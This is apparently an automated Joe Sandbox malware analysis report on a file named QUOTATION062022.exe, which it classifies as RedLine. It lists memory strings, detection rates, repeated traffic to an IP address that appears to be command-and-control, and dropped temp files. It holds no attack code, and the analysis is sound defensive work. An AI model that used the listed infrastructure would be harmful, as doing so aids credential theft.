Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: QUOTATION062022.exe	Virustotal: Detection: 47%			Perma Link
Source: QUOTATION062022.exe	ReversingLabs: Detection: 48%

Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report QUOTATION062022.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Data.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION062022.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.log

C:\Users\user\AppData\Local\Temp\tmp151F.tmp

C:\Users\user\AppData\Local\Temp\tmp1759.tmp

C:\Users\user\AppData\Local\Temp\tmp22C0.tmp

C:\Users\user\AppData\Local\Temp\tmp39BB.tmp

C:\Users\user\AppData\Local\Temp\tmp4108.tmp

C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp

C:\Users\user\AppData\Local\Temp\tmp4EA7.tmp

C:\Users\user\AppData\Local\Temp\tmp53EE.tmp

C:\Users\user\AppData\Local\Temp\tmp5452.tmp

C:\Users\user\AppData\Local\Temp\tmp5557.tmp

C:\Users\user\AppData\Local\Temp\tmp605F.tmp

Windows Analysis Report
QUOTATION062022.exe